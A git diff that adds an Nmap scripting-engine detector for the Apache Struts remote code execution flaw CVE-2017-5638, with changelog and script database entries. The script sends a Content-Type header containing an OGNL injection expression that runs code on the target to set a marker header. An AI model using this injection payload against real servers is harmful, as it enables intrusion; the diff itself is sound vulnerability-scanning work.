diff --git a/CHANGELOG b/CHANGELOG index 6dfaa49af..d810734ad 100644 --- a/CHANGELOG +++ b/CHANGELOG @@ -1,5 +1,8 @@ # Nmap Changelog ($Id$); -*-text-*- +o [NSE][GH#740] New script http-vuln-cve2017-5638 checks for the RCE bug in + Apache Struts. [Seth Jackson] + o [NSE] Added several commands to redis-info to extract listening addresses, connected clients, active channels, and cluster nodes. [Vasiliy Kulikov] diff --git a/scripts/http-vuln-cve2017-5638.nse b/scripts/http-vuln-cve2017-5638.nse new file mode 100644 index 000000000..4d9cb1092 --- /dev/null +++ b/scripts/http-vuln-cve2017-5638.nse @@ -0,0 +1,75 @@ +description = [[ +Detects whether the specified URL is vulnerable to the Apache Struts +Remote Code Execution Vulnerability (CVE-2017-5638). +]] + +local http = require "http" +local shortport = require "shortport" +local vulns = require "vulns" +local stdnse = require "stdnse" +local string = require "string" + +--- +-- @usage +-- nmap -p --script http-vuln-cve2017-5638 +-- +-- @output +-- PORT STATE SERVICE +-- 80/tcp open http +-- | http-vuln-cve2017-5638: +-- | VULNERABLE +-- | Apache Struts Remote Code Execution Vulnerability +-- | State: VULNERABLE +-- | IDs: CVE:CVE-2017-5638 +-- | +-- | Disclosure date: 2017-03-07 +-- | References: +-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638 +-- | https://cwiki.apache.org/confluence/display/WW/S2-045 +-- |_ http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html +-- +-- @args http-vuln-cve2017-5638.path The URL path to request. The default path is "/". + +author = "Seth Jackson" +license = "Same as Nmap--See https://nmap.org/book/man-legal.html" +categories = { "vuln" } + +portrule = shortport.http + +action = function(host, port) + local vuln = { + title = "Apache Struts Remote Code Execution Vulnerability", + state = vulns.STATE.NOT_VULN, + description = [[ +Apache Struts 2.3.5 - Struts 2.3.31 and Apache Struts 2.5 - Struts 2.5.10 are vulnerable to a Remote Code Execution +vulnerability via the Content-Type header. + ]], + IDS = { + CVE = "CVE-2017-5638" + }, + references = { + 'https://cwiki.apache.org/confluence/display/WW/S2-045', + 'http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html' + }, + dates = { + disclosure = { year = '2017', month = '03', day = '07' } + } + } + + local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) + + local path = stdnse.get_script_args(SCRIPT_NAME..".path") or "/" + local value = stdnse.generate_random_string(8) + + local header = { + ["Content-Type"] = string.format("%%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Check-Struts', '%s')}.multipart/form-data", value) + } + + local response = http.post(host, port, path, { header = header }) + + if response and response.status == 200 and response.header["x-check-struts"] == value then + vuln.state = vulns.STATE.VULN + end + + return vuln_report:make_output(vuln) +end diff --git a/scripts/script.db b/scripts/script.db index ae825b5f6..15181094a 100644 --- a/scripts/script.db +++ b/scripts/script.db @@ -261,6 +261,7 @@ Entry { filename = "http-vuln-cve2014-3704.nse", categories = { "exploit", "intr Entry { filename = "http-vuln-cve2014-8877.nse", categories = { "exploit", "intrusive", "vuln", } } Entry { filename = "http-vuln-cve2015-1427.nse", categories = { "intrusive", "vuln", } } Entry { filename = "http-vuln-cve2015-1635.nse", categories = { "safe", "vuln", } } +Entry { filename = "http-vuln-cve2017-5638.nse", categories = { "vuln", } } Entry { filename = "http-vuln-misfortune-cookie.nse", categories = { "intrusive", "vuln", } } Entry { filename = "http-vuln-wnr1000-creds.nse", categories = { "exploit", "intrusive", "vuln", } } Entry { filename = "http-waf-detect.nse", categories = { "discovery", "intrusive", } }